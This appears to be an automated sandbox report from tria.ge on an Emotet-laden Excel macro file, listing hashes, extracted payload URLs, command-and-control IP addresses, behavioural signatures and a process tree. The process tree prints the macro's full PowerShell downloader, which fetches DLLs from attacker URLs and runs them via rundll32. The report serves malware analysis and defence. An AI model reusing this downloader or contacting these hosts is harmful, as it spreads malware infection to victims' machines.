Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
24/11/2021, 17:59
211124-wk8rgsddbm 1022/11/2021, 14:46
211122-r5n6csagd6 1022/11/2021, 14:46
211122-r5csbsfgdp 1022/11/2021, 14:44
211122-r4kfsafgdn 1022/11/2021, 14:41
211122-r2x9vsfgcq 1022/11/2021, 14:20
211122-rneklaffgr 1022/11/2021, 14:15
211122-rkk8zaffgl 1017/11/2021, 06:51
211117-hm1l1aeefm 1017/11/2021, 06:37
211117-hdnk3seedn 10Analysis
-
max time kernel
21s -
max time network
21s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
22/11/2021, 14:46
Static task
static1
General
-
Target
865663204559_17_Nov_2021.xlsm
-
Size
44KB
-
MD5
477fd718bb764ffe3c5afde16c6c8dd2
-
SHA1
eb932e19d95f88d64270d40cdc0b92c6d1cf63be
-
SHA256
ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3
-
SHA512
f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267
Malware Config
Extracted
https://evgeniys.ru/sap-logs/D6/
http://crownadvertising.ca/wp-includes/OxiAACCoic/
https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/
http://immoinvest.com.br/blog_old/wp-admin/luoT/
https://yoho.love/wp-content/e4laFBDXIvYT6O/
https://www.168801.xyz/wp-content/6J3CV4meLxvZP/
https://www.pasionportufuturo.pe/wp-content/XUBS/
Extracted
emotet
Epoch4
91.200.186.228:443
191.252.196.221:8080
94.177.248.64:443
66.42.55.5:7080
103.8.26.103:8080
185.184.25.237:8080
103.8.26.102:8080
178.79.147.66:8080
58.227.42.236:80
45.118.135.203:7080
103.75.201.2:443
195.154.133.20:443
45.142.114.231:8080
212.237.5.209:443
207.38.84.195:8080
104.251.214.46:8080
212.237.17.99:8080
212.237.56.116:7080
216.158.226.206:443
110.232.117.186:8080
158.69.222.101:443
107.182.225.142:8080
176.104.106.96:8080
81.0.236.90:443
50.116.54.215:443
138.185.72.26:8080
51.68.175.8:8080
210.57.217.132:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1868 4024 cmd.exe 68 -
suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 3 IoCs
flow pid Process 26 2416 powershell.exe 32 2416 powershell.exe 44 3188 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
pid Process 1808 rundll32.exe 680 rundll32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Bxachutoyjs\unzedrunujmobju.rov rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4024 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2416 powershell.exe 2416 powershell.exe 2416 powershell.exe 3188 rundll32.exe 3188 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2416 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4024 EXCEL.EXE 4024 EXCEL.EXE 4024 EXCEL.EXE 4024 EXCEL.EXE 4024 EXCEL.EXE 4024 EXCEL.EXE 4024 EXCEL.EXE 4024 EXCEL.EXE 4024 EXCEL.EXE 4024 EXCEL.EXE 4024 EXCEL.EXE 4024 EXCEL.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 4024 wrote to memory of 1868 4024 EXCEL.EXE 70 PID 4024 wrote to memory of 1868 4024 EXCEL.EXE 70 PID 1868 wrote to memory of 2416 1868 cmd.exe 72 PID 1868 wrote to memory of 2416 1868 cmd.exe 72 PID 2416 wrote to memory of 1808 2416 powershell.exe 74 PID 2416 wrote to memory of 1808 2416 powershell.exe 74 PID 2416 wrote to memory of 1808 2416 powershell.exe 74 PID 1808 wrote to memory of 680 1808 rundll32.exe 75 PID 1808 wrote to memory of 680 1808 rundll32.exe 75 PID 1808 wrote to memory of 680 1808 rundll32.exe 75 PID 680 wrote to memory of 1516 680 rundll32.exe 76 PID 680 wrote to memory of 1516 680 rundll32.exe 76 PID 680 wrote to memory of 1516 680 rundll32.exe 76 PID 1516 wrote to memory of 3188 1516 rundll32.exe 77 PID 1516 wrote to memory of 3188 1516 rundll32.exe 77 PID 1516 wrote to memory of 3188 1516 rundll32.exe 77
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\SysWow64\rundll32.exe"C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\2082074918.dll,f2568762904⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\2082074918.dll",Control_RunDLL5⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bxachutoyjs\unzedrunujmobju.rov",QnYEvEaWkGYXF6⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bxachutoyjs\unzedrunujmobju.rov",Control_RunDLL7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3188
-
-
-
-
-
-